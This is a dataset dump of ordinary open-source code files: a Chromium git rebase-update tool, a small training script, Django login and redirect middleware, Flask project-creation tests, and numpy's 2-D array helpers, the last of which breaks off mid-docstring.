| repo_name (string, 5-100 chars) | path (string, 4-375 chars) | copies (991 classes) | size (string, 4-7 chars) | content (string, 666-1M chars) | license (15 classes) |
|---|---|---|---|---|---|
junhuac/MQUIC | depot_tools/git_rebase_update.py | 1 | 11254 | #!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Tool to update all branches to have the latest changes from their upstreams.
"""
import argparse
import collections
import logging
import sys
import textwrap
import os
from fnmatch import fnmatch
from pprint import pformat
import git_common as git
STARTING_BRANCH_KEY = 'depot-tools.rebase-update.starting-branch'
STARTING_WORKDIR_KEY = 'depot-tools.rebase-update.starting-workdir'
def find_return_branch_workdir():
"""Finds the branch and working directory which we should return to after
rebase-update completes.
These values may persist across multiple invocations of rebase-update, if
rebase-update runs into a conflict mid-way.
"""
return_branch = git.config(STARTING_BRANCH_KEY)
workdir = git.config(STARTING_WORKDIR_KEY)
if not return_branch:
workdir = os.getcwd()
git.set_config(STARTING_WORKDIR_KEY, workdir)
return_branch = git.current_branch()
if return_branch != 'HEAD':
git.set_config(STARTING_BRANCH_KEY, return_branch)
return return_branch, workdir
def fetch_remotes(branch_tree):
"""Fetches all remotes which are needed to update |branch_tree|."""
fetch_tags = False
remotes = set()
tag_set = git.tags()
fetchspec_map = {}
all_fetchspec_configs = git.config_regexp(r'^remote\..*\.fetch')
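# Build a map from each remote's fetch refspec destination pattern
# (e.g. 'refs/remotes/origin/*') to the remote's name, so that a branch's
# upstream ref can later be matched back to the remote that provides it.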
for fetchspec_config in all_fetchspec_configs:
key, _, fetchspec = fetchspec_config.partition(' ')
dest_spec = fetchspec.partition(':')[2]
remote_name = key.split('.')[1]
fetchspec_map[dest_spec] = remote_name
for parent in branch_tree.itervalues():
if parent in tag_set:
fetch_tags = True
else:
full_ref = git.run('rev-parse', '--symbolic-full-name', parent)
for dest_spec, remote_name in fetchspec_map.iteritems():
if fnmatch(full_ref, dest_spec):
remotes.add(remote_name)
break
fetch_args = []
if fetch_tags:
# Need to fetch all because we don't know what remote the tag comes from :(
# TODO(iannucci): assert that the tags are in the remote fetch refspec
fetch_args = ['--all']
else:
fetch_args.append('--multiple')
fetch_args.extend(remotes)
# TODO(iannucci): Should we fetch git-svn?
if not fetch_args: # pragma: no cover
print 'Nothing to fetch.'
else:
git.run_with_stderr('fetch', *fetch_args, stdout=sys.stdout,
stderr=sys.stderr)
def remove_empty_branches(branch_tree):
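"""Removes branches whose tree is identical to their parent's, reparenting
any downstream branches onto that parent first (summary of the logic below)."""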
tag_set = git.tags()
ensure_root_checkout = git.once(lambda: git.run('checkout', git.root()))
deletions = {}
reparents = {}
downstreams = collections.defaultdict(list)
for branch, parent in git.topo_iter(branch_tree, top_down=False):
downstreams[parent].append(branch)
# If branch and parent have the same tree, then branch has to be marked
# for deletion and its children and grand-children reparented to parent.
if git.hash_one(branch+":") == git.hash_one(parent+":"):
ensure_root_checkout()
logging.debug('branch %s merged to %s', branch, parent)
# Mark branch for deletion while remembering the ordering, then add all
# its children as grand-children of its parent and record reparenting
# information if necessary.
deletions[branch] = len(deletions)
for down in downstreams[branch]:
if down in deletions:
continue
# Record the new and old parent for down, or update such a record
# if it already exists. Keep track of the ordering so that reparenting
# happens in topological order.
downstreams[parent].append(down)
if down not in reparents:
reparents[down] = (len(reparents), parent, branch)
else:
order, _, old_parent = reparents[down]
reparents[down] = (order, parent, old_parent)
# Apply all reparenting recorded, in order.
for branch, value in sorted(reparents.iteritems(), key=lambda x:x[1][0]):
_, parent, old_parent = value
if parent in tag_set:
git.set_branch_config(branch, 'remote', '.')
git.set_branch_config(branch, 'merge', 'refs/tags/%s' % parent)
print ('Reparented %s to track %s [tag] (was tracking %s)'
% (branch, parent, old_parent))
else:
git.run('branch', '--set-upstream-to', parent, branch)
print ('Reparented %s to track %s (was tracking %s)'
% (branch, parent, old_parent))
# Apply all deletions recorded, in order.
for branch, _ in sorted(deletions.iteritems(), key=lambda x: x[1]):
print git.run('branch', '-d', branch)
def rebase_branch(branch, parent, start_hash):
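"""Rebases |branch| onto |parent| starting from |start_hash|. If the plain
rebase fails, attempts a squash-and-rebase to detect an effectively empty
branch. Returns True on success, False if manual resolution is required."""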
logging.debug('considering %s(%s) -> %s(%s) : %s',
branch, git.hash_one(branch), parent, git.hash_one(parent),
start_hash)
# If parent has FROZEN commits, don't base branch on top of them. Instead,
# base branch on top of whatever commit is before them.
back_ups = 0
orig_parent = parent
while git.run('log', '-n1', '--format=%s',
parent, '--').startswith(git.FREEZE):
back_ups += 1
parent = git.run('rev-parse', parent+'~')
if back_ups:
logging.debug('Backed parent up by %d from %s to %s',
back_ups, orig_parent, parent)
if git.hash_one(parent) != start_hash:
# Try a plain rebase first
print 'Rebasing:', branch
rebase_ret = git.rebase(parent, start_hash, branch, abort=True)
if not rebase_ret.success:
# TODO(iannucci): Find collapsible branches in a smarter way?
print "Failed! Attempting to squash", branch, "...",
squash_branch = branch+"_squash_attempt"
git.run('checkout', '-b', squash_branch)
git.squash_current_branch(merge_base=start_hash)
# Try to rebase the branch_squash_attempt branch to see if it's empty.
squash_ret = git.rebase(parent, start_hash, squash_branch, abort=True)
empty_rebase = git.hash_one(squash_branch) == git.hash_one(parent)
git.run('checkout', branch)
git.run('branch', '-D', squash_branch)
if squash_ret.success and empty_rebase:
print 'Success!'
git.squash_current_branch(merge_base=start_hash)
git.rebase(parent, start_hash, branch)
else:
print "Failed!"
print
# rebase and leave in mid-rebase state.
# This second rebase attempt should always fail in the same
# way that the first one does. If it magically succeeds then
# something very strange has happened.
second_rebase_ret = git.rebase(parent, start_hash, branch)
if second_rebase_ret.success: # pragma: no cover
print "Second rebase succeeded unexpectedly!"
print "Please see: http://crbug.com/425696"
print "First rebased failed with:"
print rebase_ret.stderr
else:
print "Here's what git-rebase (squashed) had to say:"
print
print squash_ret.stdout
print squash_ret.stderr
print textwrap.dedent(
"""\
Squashing failed. You probably have a real merge conflict.
Your working copy is in mid-rebase. Either:
* completely resolve like a normal git-rebase; OR
* abort the rebase and mark this branch as dormant:
git config branch.%s.dormant true
And then run `git rebase-update` again to resume.
""" % branch)
return False
else:
print '%s up-to-date' % branch
git.remove_merge_base(branch)
git.get_or_create_merge_base(branch)
return True
def main(args=None):
parser = argparse.ArgumentParser()
parser.add_argument('--verbose', '-v', action='store_true')
parser.add_argument('--keep-going', '-k', action='store_true',
help='Keep processing past failed rebases.')
parser.add_argument('--no_fetch', '--no-fetch', '-n',
action='store_true',
help='Skip fetching remotes.')
opts = parser.parse_args(args)
if opts.verbose: # pragma: no cover
logging.getLogger().setLevel(logging.DEBUG)
# TODO(iannucci): snapshot all branches somehow, so we can implement
# `git rebase-update --undo`.
# * Perhaps just copy packed-refs + refs/ + logs/ to the side?
# * commit them to a secret ref?
# * Then we could view a summary of each run as a
# `diff --stat` on that secret ref.
if git.in_rebase():
# TODO(iannucci): Be able to resume rebase with flags like --continue,
# etc.
print (
'Rebase in progress. Please complete the rebase before running '
'`git rebase-update`.'
)
return 1
return_branch, return_workdir = find_return_branch_workdir()
os.chdir(git.run('rev-parse', '--show-toplevel'))
if git.current_branch() == 'HEAD':
if git.run('status', '--porcelain'):
print 'Cannot rebase-update with detached head + uncommitted changes.'
return 1
else:
git.freeze() # just in case there are any local changes.
skipped, branch_tree = git.get_branch_tree()
for branch in skipped:
print 'Skipping %s: No upstream specified' % branch
if not opts.no_fetch:
fetch_remotes(branch_tree)
merge_base = {}
for branch, parent in branch_tree.iteritems():
merge_base[branch] = git.get_or_create_merge_base(branch, parent)
logging.debug('branch_tree: %s' % pformat(branch_tree))
logging.debug('merge_base: %s' % pformat(merge_base))
retcode = 0
unrebased_branches = []
# Rebase each branch starting with the root-most branches and working
# towards the leaves.
for branch, parent in git.topo_iter(branch_tree):
if git.is_dormant(branch):
print 'Skipping dormant branch', branch
else:
ret = rebase_branch(branch, parent, merge_base[branch])
if not ret:
retcode = 1
if opts.keep_going:
print '--keep-going set, continuing with next branch.'
unrebased_branches.append(branch)
if git.in_rebase():
git.run_with_retcode('rebase', '--abort')
if git.in_rebase(): # pragma: no cover
print 'Failed to abort rebase. Something is really wrong.'
break
else:
break
if unrebased_branches:
print
print 'The following branches could not be cleanly rebased:'
for branch in unrebased_branches:
print ' %s' % branch
if not retcode:
remove_empty_branches(branch_tree)
# return_branch may not be there any more.
if return_branch in git.branches():
git.run('checkout', return_branch)
git.thaw()
else:
root_branch = git.root()
if return_branch != 'HEAD':
print (
"%r was merged with its parent, checking out %r instead."
% (return_branch, root_branch)
)
git.run('checkout', root_branch)
if return_workdir:
os.chdir(return_workdir)
git.set_config(STARTING_BRANCH_KEY, '')
git.set_config(STARTING_WORKDIR_KEY, '')
return retcode
if __name__ == '__main__': # pragma: no cover
try:
sys.exit(main())
except KeyboardInterrupt:
sys.stderr.write('interrupted\n')
sys.exit(1)
| mit |
MultiPath/Dep-Compo | execute.py | 1 | 1033 | #!/usr/bin/python2.7
# -*- coding: utf-8 -*-
from structure import DependencyTree
from DepNN import DepNN
#Main class to execute the task.
class Execute(object):
def __init__(self):
self.depnn = DepNN()
self.depnn.extendLookUp('../data/depcheck2')
self.depnn.load_wordvector('../data/word-vec.bin')
self.deptree = DependencyTree()
def build_model(self):
self.depnn.build_AutoEncoder(200, '../data/compilation.bin')
def load_model(self):
self.depnn.load_AutoEncoder('../data/compilation.bin')
def train_sentence(self, lines):
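# lines[0] is expected to hold the raw sentence and lines[1] its dependency
# annotation, per the DependencyTree read_* calls below.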
w = self.deptree.read_sent(lines[0])
y = self.deptree.read_dependency(lines[1])
#self.depnn.saveRAE('../data/weights.bin')
#self.depnn.loadRAE('../data/weights.bin')
print ' '.join(x[0] for x in w)
self.depnn.build_DepRNN_Tree(y)
def dump_weights(self, db_file):
self.depnn.saveRAE(db_file)
def load_weights(self, db_file):
self.depnn.loadRAE(db_file)
| gpl-2.0 |
FreeAgent/djangoappengine-starter | djangotoolbox/middleware.py | 85 | 2801 | from django.conf import settings
from django.http import HttpResponseRedirect
from django.utils.cache import patch_cache_control
LOGIN_REQUIRED_PREFIXES = getattr(settings, 'LOGIN_REQUIRED_PREFIXES', ())
NO_LOGIN_REQUIRED_PREFIXES = getattr(settings, 'NO_LOGIN_REQUIRED_PREFIXES', ())
ALLOWED_DOMAINS = getattr(settings, 'ALLOWED_DOMAINS', None)
NON_REDIRECTED_PATHS = getattr(settings, 'NON_REDIRECTED_PATHS', ())
NON_REDIRECTED_BASE_PATHS = tuple(path.rstrip('/') + '/'
for path in NON_REDIRECTED_PATHS)
class LoginRequiredMiddleware(object):
"""
Redirects to login page if request path begins with a
LOGIN_REQUIRED_PREFIXES prefix. You can also specify
NO_LOGIN_REQUIRED_PREFIXES which take precedence.
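Example (illustrative settings values, not taken from a real project):
LOGIN_REQUIRED_PREFIXES = ('/private/',)
NO_LOGIN_REQUIRED_PREFIXES = ('/private/docs/',)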
"""
def process_request(self, request):
for prefix in NO_LOGIN_REQUIRED_PREFIXES:
if request.path.startswith(prefix):
return None
for prefix in LOGIN_REQUIRED_PREFIXES:
if request.path.startswith(prefix) and \
not request.user.is_authenticated():
from django.contrib.auth.views import redirect_to_login
return redirect_to_login(request.get_full_path())
return None
class RedirectMiddleware(object):
"""
A static redirect middleware. Mostly useful for hosting providers that
automatically setup an alternative domain for your website. You might
not want anyone to access the site via those possibly well-known URLs.
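Example (illustrative setting, not taken from a real project):
ALLOWED_DOMAINS = ('www.example.com',)
Requests whose host is not in this tuple are redirected to the first entry.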
"""
def process_request(self, request):
host = request.get_host().split(':')[0]
# Turn off redirects when in debug mode, running unit tests, or
# when handling an App Engine cron job.
if (settings.DEBUG or host == 'testserver' or
not ALLOWED_DOMAINS or
request.META.get('HTTP_X_APPENGINE_CRON') == 'true' or
request.path.startswith('/_ah/') or
request.path in NON_REDIRECTED_PATHS or
request.path.startswith(NON_REDIRECTED_BASE_PATHS)):
return
if host not in settings.ALLOWED_DOMAINS:
return HttpResponseRedirect('http://' + settings.ALLOWED_DOMAINS[0]
+ request.path)
class NoHistoryCacheMiddleware(object):
"""
If user is authenticated we disable browser caching of pages in history.
"""
def process_response(self, request, response):
if 'Expires' not in response and \
'Cache-Control' not in response and \
hasattr(request, 'session') and \
request.user.is_authenticated():
patch_cache_control(response,
no_store=True, no_cache=True, must_revalidate=True, max_age=0)
return response
| bsd-3-clause |
soasme/rio | tests/blueprints/dashboard/test_views.py | 1 | 1243 | # -*- coding: utf-8 -*-
from flask import url_for
from flask_login import login_user
def test_new_project_require_name(client, login):
resp = client.post(url_for('dashboard.new_project'), data={'name': ''})
assert resp.status_code == 400
assert resp.json['errors']['name']
def test_new_project_success(client, login):
resp = client.post(url_for('dashboard.new_project'), data={'name': 'New Project'})
assert resp.status_code == 200
assert resp.json['id']
assert resp.json['name'] == 'New Project'
assert resp.json['slug'] == 'new-project'
assert resp.json['owner_id'] == login.id
def test_new_project_twice(client, login):
resp = client.post(url_for('dashboard.new_project'), data={'name': 'New Project'})
resp = client.post(url_for('dashboard.new_project'), data={'name': 'New Project'})
assert resp.status_code == 400
assert resp.json['errors']['name'] == ['duplicated slug.']
def test_new_project_insensitive_slug(client, login):
resp = client.post(url_for('dashboard.new_project'), data={'name': 'New Project'})
assert resp.json['slug'] == 'new-project'
resp = client.post(url_for('dashboard.new_project'), data={'name': 'new project'})
assert resp.status_code == 400
| mit |
teoliphant/numpy-refactor | numpy/lib/twodim_base.py | 5 | 22944 | """ Basic functions for manipulating 2d arrays
"""
__all__ = ['diag','diagflat','eye','fliplr','flipud','rot90','tri','triu',
'tril','vander','histogram2d','mask_indices',
'tril_indices','tril_indices_from','triu_indices','triu_indices_from',
]
from numpy.core.numeric import asanyarray, equal, subtract, arange, \
zeros, greater_equal, multiply, ones, asarray, alltrue, where, \
empty
def fliplr(m):
"""
Flip array in the left/right direction.
Flip the entries in each row in the left/right direction.
Columns are preserved, but appear in a different order than before.
Parameters
----------
m : array_like
Input array.
Returns
-------
f : ndarray
A view of `m` with the columns reversed. Since a view
is returned, this operation is :math:`\\mathcal O(1)`.
See Also
--------
flipud : Flip array in the up/down direction.
rot90 : Rotate array counterclockwise.
Notes
-----
Equivalent to A[:,::-1]. Does not require the array to be
two-dimensional.
Examples
--------
>>> A = np.diag([1.,2.,3.])
>>> A
array([[ 1., 0., 0.],
[ 0., 2., 0.],
[ 0., 0., 3.]])
>>> np.fliplr(A)
array([[ 0., 0., 1.],
[ 0., 2., 0.],
[ 3., 0., 0.]])
>>> A = np.random.randn(2,3,5)
>>> np.all(np.fliplr(A)==A[:,::-1,...])
True
"""
m = asanyarray(m)
if m.ndim < 2:
raise ValueError, "Input must be >= 2-d."
return m[:, ::-1]
def flipud(m):
"""
Flip array in the up/down direction.
Flip the entries in each column in the up/down direction.
Rows are preserved, but appear in a different order than before.
Parameters
----------
m : array_like
Input array.
Returns
-------
out : array_like
A view of `m` with the rows reversed. Since a view is
returned, this operation is :math:`\\mathcal O(1)`.
See Also
--------
fliplr : Flip array in the left/right direction.
rot90 : Rotate array counterclockwise.
Notes
-----
Equivalent to ``A[::-1,...]``.
Does not require the array to be two-dimensional.
Examples
--------
>>> A = np.diag([1.0, 2, 3])
>>> A
array([[ 1., 0., 0.],
[ 0., 2., 0.],
[ 0., 0., 3.]])
>>> np.flipud(A)
array([[ 0., 0., 3.],
[ 0., 2., 0.],
[ 1., 0., 0.]])
>>> A = np.random.randn(2,3,5)
>>> np.all(np.flipud(A)==A[::-1,...])
True
>>> np.flipud([1,2])
array([2, 1])
"""
m = asanyarray(m)
if m.ndim < 1:
raise ValueError, "Input must be >= 1-d."
return m[::-1,...]
def rot90(m, k=1):
"""
Rotate an array by 90 degrees in the counter-clockwise direction.
The first two dimensions are rotated; therefore, the array must be at
least 2-D.
Parameters
----------
m : array_like
Array of two or more dimensions.
k : integer
Number of times the array is rotated by 90 degrees.
Returns
-------
y : ndarray
Rotated array.
See Also
--------
fliplr : Flip an array horizontally.
flipud : Flip an array vertically.
Examples
--------
>>> m = np.array([[1,2],[3,4]], int)
>>> m
array([[1, 2],
[3, 4]])
>>> np.rot90(m)
array([[2, 4],
[1, 3]])
>>> np.rot90(m, 2)
array([[4, 3],
[2, 1]])
"""
m = asanyarray(m)
if m.ndim < 2:
raise ValueError, "Input must >= 2-d."
k = k % 4
if k == 0: return m
elif k == 1: return fliplr(m).swapaxes(0,1)
elif k == 2: return fliplr(flipud(m))
else: return fliplr(m.swapaxes(0,1)) # k==3
def eye(N, M=None, k=0, dtype=float):
"""
Return a 2-D array with ones on the diagonal and zeros elsewhere.
Parameters
----------
N : int
Number of rows in the output.
M : int, optional
Number of columns in the output. If None, defaults to `N`.
k : int, optional
Index of the diagonal: 0 refers to the main diagonal, a positive value
refers to an upper diagonal, and a negative value to a lower diagonal.
dtype : dtype, optional
Data-type of the returned array.
Returns
-------
I : ndarray (N,M)
An array where all elements are equal to zero, except for the `k`-th
diagonal, whose values are equal to one.
See Also
--------
diag : Return a diagonal 2-D array using a 1-D array specified by the user.
Examples
--------
>>> np.eye(2, dtype=int)
array([[1, 0],
[0, 1]])
>>> np.eye(3, k=1)
array([[ 0., 1., 0.],
[ 0., 0., 1.],
[ 0., 0., 0.]])
"""
if M is None:
M = N
m = zeros((N, M), dtype=dtype)
if k >= M:
return m
if k >= 0:
i = k
else:
i = (-k) * M
m[:M-k].flat[i::M+1] = 1
return m
def diag(v, k=0):
"""
Extract a diagonal or construct a diagonal array.
Parameters
----------
v : array_like
If `v` is a 2-D array, return a copy of its `k`-th diagonal.
If `v` is a 1-D array, return a 2-D array with `v` on the `k`-th
diagonal.
k : int, optional
Diagonal in question. The default is 0. Use `k>0` for diagonals
above the main diagonal, and `k<0` for diagonals below the main
diagonal.
Returns
-------
out : ndarray
The extracted diagonal or constructed diagonal array.
See Also
--------
diagonal : Return specified diagonals.
diagflat : Create a 2-D array with the flattened input as a diagonal.
trace : Sum along diagonals.
triu : Upper triangle of an array.
tril : Lower triangle of an array.
Examples
--------
>>> x = np.arange(9).reshape((3,3))
>>> x
array([[0, 1, 2],
[3, 4, 5],
[6, 7, 8]])
>>> np.diag(x)
array([0, 4, 8])
>>> np.diag(x, k=1)
array([1, 5])
>>> np.diag(x, k=-1)
array([3, 7])
>>> np.diag(np.diag(x))
array([[0, 0, 0],
[0, 4, 0],
[0, 0, 8]])
"""
v = asarray(v)
s = v.shape
if len(s) == 1:
n = s[0]+abs(k)
res = zeros((n,n), v.dtype)
if k >= 0:
i = k
else:
i = (-k) * n
res[:n-k].flat[i::n+1] = v
return res
elif len(s) == 2:
if k >= s[1]:
return empty(0, dtype=v.dtype)
if v.flags.f_contiguous:
# faster slicing
v, k, s = v.T, -k, s[::-1]
if k >= 0:
i = k
else:
i = (-k) * s[1]
return v[:s[1]-k].flat[i::s[1]+1]
else:
raise ValueError, "Input must be 1- or 2-d."
def diagflat(v,k=0):
"""
Create a two-dimensional array with the flattened input as a diagonal.
Parameters
----------
v : array_like
Input data, which is flattened and set as the `k`-th
diagonal of the output.
k : int, optional
Diagonal to set. The default is 0.
Returns
-------
out : ndarray
The 2-D output array.
See Also
--------
diag : Matlab workalike for 1-D and 2-D arrays.
diagonal : Return specified diagonals.
trace : Sum along diagonals.
Examples
--------
>>> np.diagflat([[1,2], [3,4]])
array([[1, 0, 0, 0],
[0, 2, 0, 0],
[0, 0, 3, 0],
[0, 0, 0, 4]])
>>> np.diagflat([1,2], 1)
array([[0, 1, 0],
[0, 0, 2],
[0, 0, 0]])
"""
try:
wrap = v.__array_wrap__
except AttributeError:
wrap = None
v = asarray(v).ravel()
s = len(v)
n = s + abs(k)
res = zeros((n,n), v.dtype)
if (k>=0):
i = arange(0,n-k)
fi = i+k+i*n
else:
i = arange(0,n+k)
fi = i+(i-k)*n
res.flat[fi] = v
if not wrap:
return res
return wrap(res)
def tri(N, M=None, k=0, dtype=float):
"""
Construct an array filled with ones at and below the given diagonal.
Parameters
----------
N : int
Number of rows in the array.
M : int, optional
Number of columns in the array.
By default, `M` is taken equal to `N`.
k : int, optional
The sub-diagonal below which the array is filled.
`k` = 0 is the main diagonal, while `k` < 0 is below it,
and `k` > 0 is above. The default is 0.
dtype : dtype, optional
Data type of the returned array. The default is float.
Returns
-------
T : (N,M) ndarray
Array with a lower triangle filled with ones, in other words
``T[i,j] == 1`` for ``j <= i + k``.
Examples
--------
>>> np.tri(3, 5, 2, dtype=int)
array([[1, 1, 1, 0, 0],
[1, 1, 1, 1, 0],
[1, 1, 1, 1, 1]])
>>> np.tri(3, 5, -1)
array([[ 0., 0., 0., 0., 0.],
[ 1., 0., 0., 0., 0.],
[ 1., 1., 0., 0., 0.]])
"""
if M is None: M = N
m = greater_equal(subtract.outer(arange(N), arange(M)),-k)
return m.astype(dtype)
def tril(m, k=0):
"""
Lower triangle of an array.
Return a copy of an array with elements above the `k`-th diagonal zeroed.
Parameters
----------
m : array_like, shape (M, N)
Input array.
k : int
Diagonal above which to zero elements.
`k = 0` is the main diagonal, `k < 0` is below it and `k > 0` is above.
Returns
-------
L : ndarray, shape (M, N)
Lower triangle of `m`, of same shape and data-type as `m`.
See Also
--------
triu
Examples
--------
>>> np.tril([[1,2,3],[4,5,6],[7,8,9],[10,11,12]], -1)
array([[ 0, 0, 0],
[ 4, 0, 0],
[ 7, 8, 0],
[10, 11, 12]])
"""
m = asanyarray(m)
out = multiply(tri(m.shape[0], m.shape[1], k=k, dtype=int),m)
return out
def triu(m, k=0):
"""
Upper triangle of an array.
Construct a copy of a matrix with elements below the k-th diagonal zeroed.
Please refer to the documentation for `tril`.
See Also
--------
tril
Examples
--------
>>> np.triu([[1,2,3],[4,5,6],[7,8,9],[10,11,12]], -1)
array([[ 1, 2, 3],
[ 4, 5, 6],
[ 0, 8, 9],
[ 0, 0, 12]])
"""
m = asanyarray(m)
out = multiply((1-tri(m.shape[0], m.shape[1], k-1, int)),m)
return out
# borrowed from John Hunter and matplotlib
def vander(x, N=None):
"""
Generate a Van der Monde matrix.
The columns of the output matrix are decreasing powers of the input
vector. Specifically, the i-th output column is the input vector to
the power of ``N - i - 1``. Such a matrix with a geometric progression
in each row is named Van Der Monde, or Vandermonde matrix, from
Alexandre-Theophile Vandermonde.
Parameters
----------
x : array_like
1-D input array.
N : int, optional
Order of (number of columns in) the output. If `N` is not specified,
a square array is returned (``N = len(x)``).
Returns
-------
out : ndarray
Van der Monde matrix of order `N`. The first column is ``x^(N-1)``,
the second ``x^(N-2)`` and so forth.
References
----------
.. [1] Wikipedia, "Vandermonde matrix",
http://en.wikipedia.org/wiki/Vandermonde_matrix
Examples
--------
>>> x = np.array([1, 2, 3, 5])
>>> N = 3
>>> np.vander(x, N)
array([[ 1, 1, 1],
[ 4, 2, 1],
[ 9, 3, 1],
[25, 5, 1]])
>>> np.column_stack([x**(N-1-i) for i in range(N)])
array([[ 1, 1, 1],
[ 4, 2, 1],
[ 9, 3, 1],
[25, 5, 1]])
>>> x = np.array([1, 2, 3, 5])
>>> np.vander(x)
array([[ 1, 1, 1, 1],
[ 8, 4, 2, 1],
[ 27, 9, 3, 1],
[125, 25, 5, 1]])
The determinant of a square Vandermonde matrix is the product
of the differences between the values of the input vector:
>>> np.linalg.det(np.vander(x))
48.000000000000043
>>> (5-3)*(5-2)*(5-1)*(3-2)*(3-1)*(2-1)
48
"""
x = asarray(x)
if N is None: N=len(x)
X = ones( (len(x),N), x.dtype)
for i in range(N-1):
X[:,i] = x**(N-i-1)
return X
def histogram2d(x,y, bins=10, range=None, normed=False, weights=None):
"""
Compute the bi-dimensional histogram of two data samples.
Parameters
----------
x : array_like, shape(N,)
A sequence of values to be histogrammed along the first dimension.
y : array_like, shape(M,)
A sequence of values to be histogrammed along the second dimension.
bins : int or [int, int] or array_like or [array, array], optional
The bin specification:
* If int, the number of bins for the two dimensions (nx=ny=bins).
* If [int, int], the number of bins in each dimension (nx, ny = bins).
* If array_like, the bin edges for the two dimensions (x_edges=y_edges=bins).
* If [array, array], the bin edges in each dimension (x_edges, y_edges = bins).
range : array_like, shape(2,2), optional
The leftmost and rightmost edges of the bins along each dimension
(if not specified explicitly in the `bins` parameters):
``[[xmin, xmax], [ymin, ymax]]``. All values outside of this range
will be considered outliers and not tallied in the histogram.
normed : bool, optional
If False, returns the number of samples in each bin. If True, returns
the bin density, i.e. the bin count divided by the bin area.
weights : array_like, shape(N,), optional
An array of values ``w_i`` weighing each sample ``(x_i, y_i)``. Weights
are normalized to 1 if `normed` is True. If `normed` is False, the
values of the returned histogram are equal to the sum of the weights
belonging to the samples falling into each bin.
Returns
-------
H : ndarray, shape(nx, ny)
The bi-dimensional histogram of samples `x` and `y`. Values in `x`
are histogrammed along the first dimension and values in `y` are
histogrammed along the second dimension.
xedges : ndarray, shape(nx,)
The bin edges along the first dimension.
yedges : ndarray, shape(ny,)
The bin edges along the second dimension.
See Also
--------
histogram: 1D histogram
histogramdd: Multidimensional histogram
Notes
-----
When `normed` is True, then the returned histogram is the sample density,
defined such that:
.. math::
\\sum_{i=0}^{nx-1} \\sum_{j=0}^{ny-1} H_{i,j} \\Delta x_i \\Delta y_j = 1
where `H` is the histogram array and :math:`\\Delta x_i \\Delta y_j`
the area of bin `{i,j}`.
Please note that the histogram does not follow the Cartesian convention
where `x` values are on the abscissa and `y` values on the ordinate axis.
Rather, `x` is histogrammed along the first dimension of the array
(vertical), and `y` along the second dimension of the array (horizontal).
This ensures compatibility with `histogramdd`.
Examples
--------
>>> x, y = np.random.randn(2, 100)
>>> H, xedges, yedges = np.histogram2d(x, y, bins=(5, 8))
>>> H.shape, xedges.shape, yedges.shape
((5, 8), (6,), (9,))
We can now use the Matplotlib to visualize this 2-dimensional histogram:
>>> extent = [xedges[0], xedges[-1], yedges[0], yedges[-1]]
>>> import matplotlib.pyplot as plt
>>> plt.imshow(H, extent=extent)
<matplotlib.image.AxesImage object at ...>
>>> plt.show()
"""
from numpy import histogramdd
try:
N = len(bins)
except TypeError:
N = 1
if N != 1 and N != 2:
xedges = yedges = asarray(bins, float)
bins = [xedges, yedges]
hist, edges = histogramdd([x,y], bins, range, normed, weights)
return hist, edges[0], edges[1]
def mask_indices(n,mask_func,k=0):
"""
Return the indices to access (n, n) arrays, given a masking function.
Assume `mask_func` is a function that, for a square array a of size
``(n, n)`` with a possible offset argument `k`, when called as
``mask_func(a, k)`` returns a new array with zeros in certain locations
(functions like `triu` or `tril` do precisely this). Then this function
returns the indices where the non-zero values would be located.
Parameters
----------
n : int
The returned indices will be valid to access arrays of shape (n, n).
mask_func : callable
A function whose call signature is similar to that of `triu`, `tril`.
That is, ``mask_func(x, k)`` returns a boolean array, shaped like `x`.
`k` is an optional argument to the function.
k : scalar
An optional argument which is passed through to `mask_func`. Functions
like `triu`, `tril` take a second argument that is interpreted as an
offset.
Returns
-------
indices : tuple of arrays.
The `n` arrays of indices corresponding to the locations where
``mask_func(np.ones((n, n)), k)`` is True.
See Also
--------
triu, tril, triu_indices, tril_indices
Notes
-----
.. versionadded:: 1.4.0
Examples
--------
These are the indices that would allow you to access the upper triangular
part of any 3x3 array:
>>> iu = np.mask_indices(3, np.triu)
For example, if `a` is a 3x3 array:
>>> a = np.arange(9).reshape(3, 3)
>>> a
array([[0, 1, 2],
[3, 4, 5],
[6, 7, 8]])
>>> a[iu]
array([0, 1, 2, 4, 5, 8])
An offset can be passed also to the masking function. This gets us the
indices starting on the first diagonal right of the main one:
>>> iu1 = np.mask_indices(3, np.triu, 1)
with which we now extract only three elements:
>>> a[iu1]
array([1, 2, 5])
"""
m = ones((n,n),int)
a = mask_func(m,k)
return where(a != 0)
def tril_indices(n,k=0):
"""
Return the indices for the lower-triangle of an (n, n) array.
Parameters
----------
n : int
Sets the size of the arrays for which the returned indices will be valid.
k : int, optional
Diagonal offset (see `tril` for details).
Returns
-------
inds : tuple of arrays
The indices for the triangle. The returned tuple contains two arrays,
each with the indices along one dimension of the array.
See also
--------
triu_indices : similar function, for upper-triangular.
mask_indices : generic function accepting an arbitrary mask function.
tril, triu
Notes
-----
.. versionadded:: 1.4.0
Examples
--------
Compute two different sets of indices to access 4x4 arrays, one for the
lower triangular part starting at the main diagonal, and one starting two
diagonals further right:
>>> il1 = np.tril_indices(4)
>>> il2 = np.tril_indices(4, 2)
Here is how they can be used with a sample array:
>>> a = np.arange(16).reshape(4, 4)
>>> a
array([[ 0, 1, 2, 3],
[ 4, 5, 6, 7],
[ 8, 9, 10, 11],
[12, 13, 14, 15]])
Both for indexing:
>>> a[il1]
array([ 0, 4, 5, 8, 9, 10, 12, 13, 14, 15])
And for assigning values:
>>> a[il1] = -1
>>> a
array([[-1, 1, 2, 3],
[-1, -1, 6, 7],
[-1, -1, -1, 11],
[-1, -1, -1, -1]])
These cover almost the whole array (two diagonals right of the main one):
>>> a[il2] = -10
>>> a
array([[-10, -10, -10, 3],
[-10, -10, -10, -10],
[-10, -10, -10, -10],
[-10, -10, -10, -10]])
"""
return mask_indices(n,tril,k)
def tril_indices_from(arr,k=0):
"""
Return the indices for the lower-triangle of an (n, n) array.
See `tril_indices` for full details.
Parameters
----------
arr : array_like
The indices will be valid for square arrays whose dimensions are the same as those of `arr`.
k : int, optional
Diagonal offset (see `tril` for details).
See Also
--------
tril_indices, tril
Notes
-----
.. versionadded:: 1.4.0
"""
if not (arr.ndim == 2 and arr.shape[0] == arr.shape[1]):
raise ValueError("input array must be 2-d and square")
return tril_indices(arr.shape[0],k)
def triu_indices(n,k=0):
"""
Return the indices for the upper-triangle of an (n, n) array.
Parameters
----------
n : int
Sets the size of the arrays for which the returned indices will be valid.
k : int, optional
Diagonal offset (see `triu` for details).
Returns
-------
inds : tuple of arrays
The indices for the triangle. The returned tuple contains two arrays,
